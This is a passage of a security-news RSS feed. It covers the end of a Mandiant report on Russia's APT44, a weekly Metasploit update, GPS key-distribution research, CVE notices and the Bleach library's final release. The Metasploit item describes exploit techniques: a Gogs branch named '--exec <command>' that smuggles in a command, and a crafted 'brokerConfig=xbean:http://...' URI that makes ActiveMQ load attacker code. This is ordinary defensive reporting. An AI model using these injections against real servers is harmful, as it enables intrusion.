<p><span>Despite being an arm of Russia’s military, the group’s sabotage activity is not limited to military objectives and also spans Russia’s wider national interests, such as driving the Kremlin’s political signaling efforts, responses to crises, or intended non-escalatory responses to perceived slights to Moscow’s stature in the world.  </span></p>
<p><span>APT44’s support of the Kremlin’s political objectives has resulted in some of the largest and most consequential cyber attacks in history. These operations include first-of-their-kind disruptions of Ukraine's energy grid in the winters of 2015 and 2016, the global NotPetya attack timed to coincide with Ukraine’s Constitution Day in 2017, and the disruption of the opening ceremony of the 2018 Pyeongchang Olympics in response to Russia's doping ban from the games, to name a few. </span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/apt44-fig3.max-1000x1000.png" alt="Timeline of Consequential Pre-War APT44 Operations">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="q4izg">Figure 3: Timeline of consequential pre-war APT44 operations</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><strong>Due to its history of aggressive use of network attack capabilities across political and military contexts, APT44 presents a persistent, high severity threat to governments and critical infrastructure operators globally where Russian national interests intersect. </strong><span>The combination of APT44's high capability, risk tolerance, and far-reaching mandate to support Russia’s foreign policy interests places governments, civil society, and critical infrastructure operators around the world at risk of falling into the group's sights on short notice. </span></p>
<p><span>We also judge APT44 to present a significant proliferation risk for new cyber attack concepts and methods. Continued advancements and in-the-wild use of the group’s disruptive and destructive capabilities has likely lowered the barrier of entry for other state and non-state actors to replicate and develop their own cyber attack programs. Russia itself is almost certainly alert to and concerned about this proliferation risk, as Mandiant has observed Russian cybersecurity entities </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/cosmicenergy-ot-malware-russian-response"><span>exercise</span></a><span> their ability to defend against categories of disruptive cyber capabilities originally used by APT44 against Ukraine.  </span></p>
<h2><span>Looking Ahead</span></h2>
<p><span>APT44 will almost certainly continue to present one of the widest and highest severity cyber threats globally. It has been at the forefront of the threat landscape for over a decade and is responsible for a long list of firsts that have set precedents for future cyber attack activity. Patterns of historical activity, such as efforts to influence elections or retaliate against international sporting bodies, suggest there is no limit to the nationalist impulses that may fuel the group’s operations in the future.</span></p>
<p><span>As Russia’s war continues, we anticipate Ukraine will remain the principal focus of APT44 operations. However, as history indicates, the group’s readiness to conduct cyber operations in furtherance of the Kremlin’s wider strategic objectives globally is ingrained in its mandate. We therefore assess that changing Western political dynamics, upcoming elections, and emerging issues in Russia’s near abroad will also continue to shape APT44’s operations for the foreseeable future.</span></p>
<h2><span>Protecting the Community</span></h2>
<p><span><span>As part of our research, we take various steps to protect customers and the community:</span></span></p>
<ul>
<li><span><span>Google's <a href="https://blog.google/threat-analysis-group/" rel="noopener" target="_blank">Threat Analysis Group (TAG)</a> uses the results of our research to improve the safety and security of Google’s products. </span></span>
<ul>
<li><span><span>Upon discovery, all identified websites and domains are added to </span><a href="https://safebrowsing.google.com/" rel="noopener" target="_blank"><span>Safe Browsing</span></a><span> to protect users from further exploitation. </span></span></li>
<li><span><span>All targeted Gmail and Workspace users are sent </span><a href="https://support.google.com/a/answer/9007870" rel="noopener" target="_blank"><span>government-backed attacker alerts</span></a><span>,</span><span> notifying them of the activity, encouraging potential targets to enable </span><a href="https://support.google.com/accounts/answer/11577602" rel="noopener" target="_blank"><span>Enhanced Safe Browsing</span></a><span> for Chrome, and ensuring them that all devices are updated. </span></span></li>
</ul>
</li>
<li><span><span>Where possible, Mandiant sends victim notifications via the </span><a href="https://www.mandiant.com/resources/insights/mandiant-victim-notification-program" rel="noopener" target="_blank"><span>Victim Notification Program</span></a><span>. </span></span></li>
<li><span><span>If you are a Google Chronicle Enterprise+ customer, Chronicle rules were released to your </span><a href="https://cloud.google.com/chronicle/docs/preview/curated-detections/windows-threats-category"><span>Emerging Threats</span></a><span> rule pack, and IOCs are available for prioritization with </span><span>Applied Threat Intelligence</span><span>.</span><span> </span></span></li>
<li><span><span>A VirusTotal Collection featuring <a href="https://www.virustotal.com/gui/collection/0bd93a520cae1fd917441e6e54ff263c88069ac5a7f8b9e55ef99cd961b6a1c7" rel="noopener nofollow noreferrer" target="_blank">APT44-related indicators of compromise</a> is now available for registered users.</span></span></li>
</ul>
<p><span><span>We are committed to sharing our findings with the security community to raise awareness, and with companies and individuals that might have been targeted by these activities. </span></span></p>
<p><span><span>Read the <a href="https://services.google.com/fh/files/misc/apt44-unearthing-sandworm.pdf" rel="noopener" target="_blank">APT44 report</a> for our full analysis of this group, <span>a detailed list of malware used by APT44 since 2018, </span></span></span><span>hunting rules for detecting the malware, and a list of </span><a href="https://www.mandiant.com/advantage/security-validation" rel="noopener" target="_blank"><span>Mandiant Security Validation</span></a><span> actions organizations can use to validate their security controls.</span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[More than a decade later, the team behind N++ is back with a multiplayer sequel]]></title>
<description><![CDATA[Back in 2015, the two-person studio Metanet released N++, a brutally hard 2D platformer that was a decade in the making, building off of previous releases dating back to the freeware Flash title N. At the time, cofounder Raigan Burns issued some famous last words: "We hope it's not another 10 yea...]]></description>
<link>https://tsecurity.de/de/3576767/it-nachrichten/more-than-a-decade-later-the-team-behind-n-is-back-with-a-multiplayer-sequel/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576767/it-nachrichten/more-than-a-decade-later-the-team-behind-n-is-back-with-a-multiplayer-sequel/</guid>
<pubDate>Sat, 06 Jun 2026 01:32:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Back in 2015, the two-person studio Metanet released N++, a brutally hard 2D platformer that was a decade in the making, building off of previous releases dating back to the freeware Flash title N. At the time, cofounder Raigan Burns issued some famous last words: "We hope it's not another 10 years before we come […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Weekly Metasploit Update: Apache ActiveMQ RCE, Gogs Rebase RCE, and Windows Kernel Pointer Enum]]></title>
<description><![CDATA[When Open Source is a bit too OpenSeveral fun modules landed this week, including an Apache RCE, Windows Kernel pointer collection, and Gogs RCE via naming. Leading off is Gogs' RCE that allows an attacker to execute commands by naming their branch --exec  and requesting a rebase.Another useful p...]]></description>
<link>https://tsecurity.de/de/3576745/it-security-nachrichten/weekly-metasploit-update-apache-activemq-rce-gogs-rebase-rce-and-windows-kernel-pointer-enum/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576745/it-security-nachrichten/weekly-metasploit-update-apache-activemq-rce-gogs-rebase-rce-and-windows-kernel-pointer-enum/</guid>
<pubDate>Sat, 06 Jun 2026 01:22:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>When Open Source is a bit too Open</h2><p>Several fun modules landed this week, including an Apache RCE, Windows Kernel pointer collection, and Gogs RCE via naming. Leading off is Gogs' RCE that allows an attacker to execute commands by naming their <span data-type="inlineCode">branch </span><span data-type="inlineCode">--exec &lt;command&gt;</span> and requesting a rebase.</p><p>Another useful post module by CharlesQuinnDev enumerates the Kernel pointers leaked via the popular <span data-type="inlineCode">NtQuerySystemInformation</span> technique. Those exposed pointers, combined with a good write primitive, make local privilege escalation easier to accomplish. Several local privilege escalations already use that technique, so exposing just that technique was a great call!</p><h2>New module content (3)</h2><h3>Apache ActiveMQ RCE via Jolokia addNetworkConnector</h3><p><strong>Authors:</strong> dinosn and h00die<br><strong>Type:</strong> Exploit<br><strong>Pull request:</strong> <a href="https://github.com/rapid7/metasploit-framework/pull/21497">#21497</a> contributed by <a href="https://github.com/h00die">h00die</a><br><strong>Path:</strong> <span data-type="inlineCode">multi/http/apache_activemq_jolokia_rce</span><br><strong>AttackerKB reference:</strong> <a href="https://attackerkb.com/search?q=CVE-2026-34197&amp;referrer=blog">CVE-2026-34197</a></p><p>Adds a new exploit module exploit/multi/http/apache_activemq_jolokia_rce targeting CVE-2026-34197 in Apache ActiveMQ. The module abuses the Jolokia JMX-over-HTTP API exposed at <span data-type="inlineCode">/api/jolokia/</span> by calling the <span data-type="inlineCode">addNetworkConnector()</span> MBean operation with a crafted <span data-type="inlineCode">brokerConfig=xbean:http://...</span><span data-type="inlineCode"> </span>URI. ActiveMQ fetches the attacker-controlled URL and instantiates it as a Spring XML application context, achieving remote code execution via a <span data-type="inlineCode">java.lang.ProcessBuilder</span> bean. Authentication is required to exploit this vulnerability.</p><h3>Gogs Git Rebase Argument Injection RCE</h3><p><strong>Author:</strong> Crypto-Cat<br><strong>Type:</strong> Exploit<br><strong>Pull request:</strong> <a href="https://github.com/rapid7/metasploit-framework/pull/21515">#21515</a> contributed by <a href="https://github.com/jburgess-r7">jburgess-r7</a><br><strong>Path:</strong> <span data-type="inlineCode">multi/http/gogs_rebase_rce</span></p><p>This adds an exploit module for the Gogs rebase Remote Code Execution (RCE) vulnerability. The module leverages an argument injection flaw residing in the pull request merge workflow of Gogs versions &lt;= 0.14.2 and &lt;= 0.15.0+dev.</p><h3>Windows Kernel Pointer Exposure Enumerator</h3><p><strong>Author:</strong> CharlesQuinnDev<br><strong>Type:</strong> Post<br><strong>Pull request:</strong> <a href="https://github.com/rapid7/metasploit-framework/pull/21039">#21039</a> contributed by <a href="https://github.com/CharlesQuinnDev">CharlesQuinnDev</a><br><strong>Path:</strong> <span data-type="inlineCode">windows/gather/windows_kernel_pointer_enum</span></p><p>Adds a new post module for Windows that enumerates kernel object pointers exposed through <span data-type="inlineCode">NtQuerySystemInformation</span> on <span data-type="inlineCode">x64</span> systems. The module collects observable handle metadata and provides analysis of pointer distribution, object types, and ALPC usage, then saves the results to a CSV loot file for review. Also introduces a reusable Windows kernel handle-enumeration library.</p><h2>Enhancements and features (7)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20881">#20881</a> from <a href="https://github.com/h00die">h00die</a> - This adds support for cracking Kerberos type hashes in Metasploit, specifically timeroasting, krb5tgs* and krb5asrep.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21087">#21087</a> from <a href="https://github.com/jbx81-1337">jbx81-1337</a> - The new payloads_manager plugin lets you maintain a local archive of custom payloads and stage them into the data directory. Use the <span data-type="inlineCode">fetch</span> or <span data-type="inlineCode">add</span> subcommands to download or import a payload, then select to symlink it into place so it's available to other modules. The plugin tracks each payload's name, hash, tags, and description in a database.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21412">#21412</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Updates Metasploit's post modules to now run by default against the last opened alive session, unless explicitly specified.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21429">#21429</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Removes the now redundant Linux-specific method for finding the arch so there's a single source of truth that works in a superset of platform / session-type combinations.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21488">#21488</a> from <a href="https://github.com/sjanusz-r7">sjanusz-r7</a> - Updates HTTP login scanners to report the detected service hierarchy.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21504">#21504</a> from <a href="https://github.com/h00die">h00die</a> - Adds missing CVE references to seven existing modules: gladinet_storage_access_ticket_forge (CVE-2025-14611), cassandra_web_file_read (CVE-2020-36939), pretalx_file_read_cve_2023_28459 (CVE-2023-28459 and CVE-2023-28458), centreon_pollers_auth_rce (CVE-2019-19699), wp_responsive_thumbnail_slider_upload (CVE-2015-10144), xerte_unauthenticated_template_import_rce (CVE-2026-32985), and solarwinds_storage_manager_sql (CVE-2012-2576).</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21526">#21526</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Makes stability and logging improvements to the ipmi_cipher_zero, ipmi_dumphashes, and ipmi_version modules.</li></ul><h2>Bugs fixed (7)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21432">#21432</a> from <a href="https://github.com/4ravind-b">4ravind-b</a> - Fixes a bug in modules that invoke other modules that prevented datastore options from being validated.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21448">#21448</a> from <a href="https://github.com/kx7m2qd">kx7m2qd</a> - Fixes an issue where CIDR range filters in the addresses parameter of the db.hosts RPC endpoint were not processed correctly.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21484">#21484</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Fixes python ssl command shell payloads that failed with AttributeError: module 'ssl' has no attribute 'wrap_socket'.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21489">#21489</a> from <a href="https://github.com/h00die">h00die</a> - Improves the GitLab version scanner by handling additional exceptions in the scanner for non-GitLab targets and adding additional version fingerprints for real GitLab targets.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21502">#21502</a> from <a href="https://github.com/h00die">h00die</a> - Fixes a crash in the scanner/snmp/snmp_enum module when the system date was read as Null.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21506">#21506</a> from <a href="https://github.com/h00die">h00die</a> - Adds a guard clause when running <span data-type="inlineCode">uname -r</span> in WSL startup_folder persistence.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21514">#21514</a> from <a href="https://github.com/orbit-bot">orbit-bot</a> - Fixes a couple of references to outdated msfvenom options.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-05-26T12%3A02%3A08Z..2026-06-04T12%3A43%3A08Z%22">Pull Requests 6.4.135...6.4.136</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.135...6.4.136">Full diff 6.4.135...6.4.136</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a>.</p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The US Military Quietly Turned GPS Into a Global 'Numbers Station,' Evidence Suggests]]></title>
<description><![CDATA[A security researcher says evidence suggests the U.S. military has been using an obscure GPS message field for nearly 20 years to broadcast encrypted key-distribution data, effectively turning GPS satellites into a global "numbers station." The hidden-looking 176-bit messages appear tied to the P...]]></description>
<link>https://tsecurity.de/de/3576729/it-security-nachrichten/the-us-military-quietly-turned-gps-into-a-global-numbers-station-evidence-suggests/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576729/it-security-nachrichten/the-us-military-quietly-turned-gps-into-a-global-numbers-station-evidence-suggests/</guid>
<pubDate>Sat, 06 Jun 2026 01:07:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A security researcher says evidence suggests the U.S. military has been using an obscure GPS message field for nearly 20 years to broadcast encrypted key-distribution data, effectively turning GPS satellites into a global "numbers station." The hidden-looking 176-bit messages appear tied to the Pentagon's Over-the-Air Distribution system for remotely updating cryptographic keys, meaning ordinary GPS receivers may have been receiving the traffic all along without anyone outside the military noticing. The findings have been detailed by Steven Murdoch, an information security expert, in a new article in Inside GNSS. 404 Media reports: [...] From the beginning, he suspected that the subframe field contained encrypted transmissions because the data was so random. "Random data is actually very unusual to get in nature," Murdoch said. "If you see it, either it's been carefully designed to be random -- but then, why is someone sending out random data? -- or it's encrypted data. I thought encrypted data is by far the most likely explanation." He returned to the subframe on and off over the years, and solicited guesses about its content on Stack Exchange in 2023. Ahmed Kamruddin, a master's student at UCL, developed the project further in 2025. Then, this year, Murdoch put the last pieces of the puzzle together over several weeks by analyzing open archive Global Navigation Satellite System (GNSS) recordings collected since 2007 and kept by GFZ Helmholtz Centre for Geosciences.
 
This dataset included more than 12 million observations of Subframe 4, Page 17, yielding 3,994 unique 176-bit messages. Within this corpus, Murdoch pinpointed key-repeating "sentinels" including a pattern that appeared in February 2010 and was broadcast on and off across dozens of satellites for more than a decade. Murdoch discovered that this particular sentinel was transmitted by all 31 operational satellites within a window of a few hours on May 26, 2011, potentially heralding the activation of a new operational system. He confirmed that this timeline coincided with the rollout of the military's Over-the-Air Distribution (OTAD) and the Over-the-Air Rekeying (OTAR) by cross-referencing declassified documents, including a 2015 presentation about the dates of the operation.
 
"There was a perfect match between the timeline and that presentation and the change points that were automatically identified from the data," Murdoch said. "That was the smoking gun that made me think: This is what it's for." These automated systems replaced the cumbersome manual distribution of cryptographic keying material, allowing military GPS receivers around the world to be rekeyed remotely through satellite broadcasts rather than through onsite procedures. For the next 11 years, this expansive rekeying operation was overlooked in public GPS data. In 2022, the system entered a new phase, according to Murdoch's analysis. The shift was characterized by a slowing in the message rotation rate. Later, in December 2023, broadcasts carrying a distinctive "TEXT" prefix emerged then gradually spread across the constellation.
 
Murdoch isn't sure what explains the recent transition, though it could be a possible modernization of the infrastructure or the introduction of a new protocol. But to him, the bigger takeaway is that the signals were always available for anyone willing to take a closer look, a discovery that suggests that there could be more revelations hidden for the cryptographically curious among us. "Every receiver in the world decodes Subframe 4, Page 17," Murdoch said in his new article. "Almost none of them have ever looked at it. The lesson generalizes: There is more to learn from the bytes already arriving at our antennas than from the bytes we wish were specified differently. The data are publicly available. The signal is overhead, twice a day, every day."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=The+US+Military+Quietly+Turned+GPS+Into+a+Global+'Numbers+Station%2C'+Evidence+Suggests%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F06%2F05%2F211249%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F06%2F05%2F211249%2Fthe-us-military-quietly-turned-gps-into-a-global-numbers-station-evidence-suggests%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/06/05/211249/the-us-military-quietly-turned-gps-into-a-global-numbers-station-evidence-suggests?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Proposed Federal AI Bill Would Pre-empt States for 3 Years]]></title>
<description><![CDATA[The draft regulation framework has a three-year pre-emption of state laws related to AI development. It would also extend the Cybersecurity Information Sharing Act of 2015 through fiscal 2035.]]></description>
<link>https://tsecurity.de/de/3576579/ai-nachrichten/proposed-federal-ai-bill-would-pre-empt-states-for-3-years/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576579/ai-nachrichten/proposed-federal-ai-bill-would-pre-empt-states-for-3-years/</guid>
<pubDate>Fri, 05 Jun 2026 23:02:51 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The draft regulation framework has a three-year pre-emption of state laws related to AI development. It would also extend the Cybersecurity Information Sharing Act of 2015 through fiscal 2035.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-8036 | ARM mbed TLS up to 1.3.13/2.1.2 Session Ticket Name memory corruption (FEDORA-2015-30a417bea9 / Nessus ID 88602)]]></title>
<description><![CDATA[A vulnerability was found in ARM mbed TLS up to 1.3.13/2.1.2. It has been declared as critical. This vulnerability affects unknown code of the component Session Ticket Name Handler. Executing a manipulation can lead to memory corruption.

The identification of this vulnerability is CVE-2015-8036....]]></description>
<link>https://tsecurity.de/de/3576508/sicherheitsluecken/cve-2015-8036-arm-mbed-tls-up-to-1313212-session-ticket-name-memory-corruption-fedora-2015-30a417bea9-nessus-id-88602/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576508/sicherheitsluecken/cve-2015-8036-arm-mbed-tls-up-to-1313212-session-ticket-name-memory-corruption-fedora-2015-30a417bea9-nessus-id-88602/</guid>
<pubDate>Fri, 05 Jun 2026 22:23:26 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/arm_mbed_tls">ARM mbed TLS up to 1.3.13/2.1.2</a>. It has been declared as <a href="https://vuldb.com/kb/risk">critical</a>. This vulnerability affects unknown code of the component <em>Session Ticket Name Handler</em>. Executing a manipulation can lead to memory corruption.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2015-8036">CVE-2015-8036</a>. The attack may be launched remotely. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-5291 | PolarSSL/ARM mbed TLS Hostname memory corruption (FEDORA-2015-30a417bea9 / Nessus ID 86386)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in PolarSSL and ARM mbed TLS. This impacts an unknown function of the component Hostname Handler. The manipulation leads to memory corruption.

This vulnerability is traded as CVE-2015-5291. It is possible to initiate the attack re...]]></description>
<link>https://tsecurity.de/de/3576500/sicherheitsluecken/cve-2015-5291-polarsslarm-mbed-tls-hostname-memory-corruption-fedora-2015-30a417bea9-nessus-id-86386/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576500/sicherheitsluecken/cve-2015-5291-polarsslarm-mbed-tls-hostname-memory-corruption-fedora-2015-30a417bea9-nessus-id-86386/</guid>
<pubDate>Fri, 05 Jun 2026 22:23:16 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/polarssl">PolarSSL and ARM mbed TLS</a>. This impacts an unknown function of the component <em>Hostname Handler</em>. The manipulation leads to memory corruption.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2015-5291">CVE-2015-5291</a>. It is possible to initiate the attack remotely. There is no exploit available.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Will Kahn-Greene: Bleach 6.4.0 releases -- final release]]></title>
<description><![CDATA[What is it?
Bleach is a Python library for sanitizing
and linkifying text from untrusted sources for safe usage in HTML.


Bleach v6.4.0 released!
Bleach 6.4.0 includes two security fixes, a fix to tinycss2 dependency
requirements, and some other things.
See the changes here:
https://bleach.readt...]]></description>
<link>https://tsecurity.de/de/3575588/tools/will-kahn-greene-bleach-640-releases-final-release/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3575588/tools/will-kahn-greene-bleach-640-releases-final-release/</guid>
<pubDate>Fri, 05 Jun 2026 16:10:40 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<section>
<h3>What is it?</h3>
<p><a class="reference external" href="https://bleach.readthedocs.io/">Bleach</a> is a Python library for sanitizing
and linkifying text from untrusted sources for safe usage in HTML.</p>
</section>
<section>
<h3>Bleach v6.4.0 released!</h3>
<p>Bleach 6.4.0 includes two security fixes, a fix to tinycss2 dependency
requirements, and some other things.</p>
<p>See the changes here:</p>
<p><a class="reference external" href="https://bleach.readthedocs.io/en/latest/changes.html#version-6-4-0-june-5th-2026">https://bleach.readthedocs.io/en/latest/changes.html#version-6-4-0-june-5th-2026</a></p>
</section>
<section>
<h3>Bleach v6.4.0 is the final release</h3>
<p>I haven't used Bleach on a project in years, but I still had some time to
maintain it. That changed about a year ago when I got re-orged into a new role
and I haven't had time to do any Bleach work since then.</p>
<p>To recap, Bleach sits on top of
<a class="reference external" href="https://github.com/html5lib/html5lib-python">html5lib</a> which hasn't
been actively maintained in years. It is dangerous to maintain Bleach in that
context.</p>
<p>We vendored html5lib so we could make adjustments to the library to keep Bleach
going. This is not a sustainable approach, but it was ok for the short term.</p>
<p>Over the years, we've talked about other options:</p>
<ol class="arabic simple">
<li><p>find another library to switch to</p></li>
<li><p>take over html5lib development</p></li>
<li><p>fork html5lib and vendor and maintain our fork</p></li>
<li><p>write a new HTML parser</p></li>
<li><p>etc</p></li>
</ol>
<p>None of those are feasible for me.</p>
<p>Bleach has been a solo-maintained project for a while now. The world is crazy
and it's much harder to build a team of trusted maintainers now than it was (or
at least, it sure feels that way). I don't see any possibility of increasing
the maintenance team or passing it to someone else responsibly.</p>
<p>Switching contexts from my regular work to Bleach is really hard. Bleach is
complicated, the problem domain is complicated, and there's a lot of nuanced
context. I can't just switch gears, spend 15 minutes on Bleach to do something,
and then switch back to the rest of my day. I periodically get nag messages
about this which are entirely valid, but there's nothing I can do about it.
It doesn't feel great.</p>
<p>Then in 2025, Emil, a long-time Bleach contributor, built
<a class="reference external" href="https://emilstenstrom.github.io/justhtml/">justhtml</a> which gives us an easy
migration path off of Bleach. He even took the time to write a
<a class="reference external" href="https://emilstenstrom.github.io/justhtml/bleach-migration.html">migration guide</a>.</p>
</section>
<section>
<h3>Thoughts and statistics</h3>
<p>In 2019, when I stepped down the first time, I wrote
<a class="reference external" href="https://bluesock.org/~willkg/blog/dev/bleach_stepping_down.html">a post on stepping down</a>.</p>
<p>In 2023, when I deprecated the project, I wrote
<a class="reference external" href="https://bluesock.org/~willkg/blog/dev/bleach_6_0_0_deprecation.html">a post on Bleach 6.0.0 and deprecation</a>.</p>
<ul class="simple">
<li><p>From the first commit on 2010-02-18 to today's final commit on 2026-06-05,
the Bleach project lasted 16 years, 3 months — 5,951 days, or about 16.29
years.</p></li>
<li><p>There were 64 releases.</p></li>
<li><p>There were roughly 960 commits.</p>
<ul>
<li><p>From 80 roughly contributors</p></li>
<li><p>Top 3:</p>
<ul>
<li><p>Will Kahn-Greene: 462</p></li>
<li><p>James Socol: 182</p></li>
<li><p>Greg Guthe: 133</p></li>
</ul>
</li>
</ul>
</li>
<li><p>Roughly 5,040 lines of Python code excluding the vendored html5lib.</p></li>
<li><p>I was maintainer from October 2015 to now--that's a little under 11 years.</p></li>
</ul>
<p>It feels weird to end a project that's outlived many of the Mozilla sites and
Python web frameworks it was designed to protect.</p>
</section>
<section>
<h3>What happens now?</h3>
<p>This is the end of the project.</p>
<figure>
<a class="reference external image-reference" href="https://bluesock.org/~willkg/blog/images/bleach_deprecation.jpg">
<img alt="/images/bleach_deprecation.thumbnail.jpg" src="https://bluesock.org/~willkg/blog/images/bleach_deprecation.thumbnail.jpg">
</a>
<figcaption>
<p>Bleach. Last release.</p>
</figcaption>
</figure>
<p>If you're still using Bleach, I think you have three options:</p>
<ol class="arabic simple">
<li><p><strong>End your project.</strong> Maybe you don't need to be maintaining your thing
anymore? Use Bleach as your reason to exit and do something different with
your time on Earth.</p></li>
<li><p><strong>Switch to the sanitizer API.</strong> Rework your project to use the sanitizer API.</p>
<ul class="simple">
<li><p>Spec: <a class="reference external" href="https://wicg.github.io/sanitizer-api/">https://wicg.github.io/sanitizer-api/</a></p></li>
<li><p>Docs: <a class="reference external" href="https://developer.mozilla.org/en-US/docs/Web/API/Element/setHTML">https://developer.mozilla.org/en-US/docs/Web/API/Element/setHTML</a></p></li>
</ul>
</li>
<li><p><strong>Swap Bleach out for justhtml.</strong> Emil provided a
<a class="reference external" href="https://emilstenstrom.github.io/justhtml/bleach-migration.html">migration guide</a>
for switching from Bleach to justhtml.</p></li>
</ol>
<p>Good luck with whatever option you choose!</p>
</section>
<section>
<h3>Thanks!</h3>
<p>Many thanks to <a class="reference external" href="https://github.com/jsocol">James</a> who created Bleach and
gave it a set of first principles that guided our choices for 16 years.</p>
<p>Many thanks to <a class="reference external" href="https://github.com/g-k">Greg</a> who I worked with on Bleach
for a long while and maintained Bleach for several years. Working with Greg was
always easy and his reviews were thoughtful and spot-on.</p>
<p>Many thanks to <a class="reference external" href="https://github.com/EmilStenstrom">Emil</a> who was
a contributor to Bleach for a long while and created
<a class="reference external" href="https://emilstenstrom.github.io/justhtml/">justhtml</a>
providing Bleach users a migration path.</p>
<p>Many thanks to <a class="reference external" href="https://github.com/jvanasco">Jonathan</a> who, over the years,
provided a lot of insight into how best to solve some of Bleach's more
squirrely problems.</p>
<p>Many thanks to <a class="reference external" href="https://github.com/gsnedders">Sam</a> who was an indispensible
resource on HTML parsing and sanitizing text in the context of HTML.</p>
<p>Many thanks to all the users and contributors of Bleach!</p>
</section>
<section>
<h3>Where to go for more</h3>
<p>For more specifics on this release, see here:
<a class="reference external" href="https://bleach.readthedocs.io/en/latest/changes.html#version-6-4-0-june-5th-2026">https://bleach.readthedocs.io/en/latest/changes.html#version-6-4-0-june-5th-2026</a></p>
<p>Documentation and quickstart here:
<a class="reference external" href="https://bleach.readthedocs.io/en/latest/">https://bleach.readthedocs.io/en/latest/</a></p>
<p>Source code and issue tracker here:
<a class="reference external" href="https://github.com/mozilla/bleach/">https://github.com/mozilla/bleach/</a></p>
</section>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-5240 | OpenStack Neutron up to 2014.2.3/2015.1.1 ML2 Plugin race condition (RHSA-2015:1909 / Nessus ID 318733)]]></title>
<description><![CDATA[A vulnerability described as problematic has been identified in OpenStack Neutron up to 2014.2.3/2015.1.1. Affected is an unknown function of the component ML2 Plugin. Such manipulation leads to race condition.

This vulnerability is uniquely identified as CVE-2015-5240. The attack can be launche...]]></description>
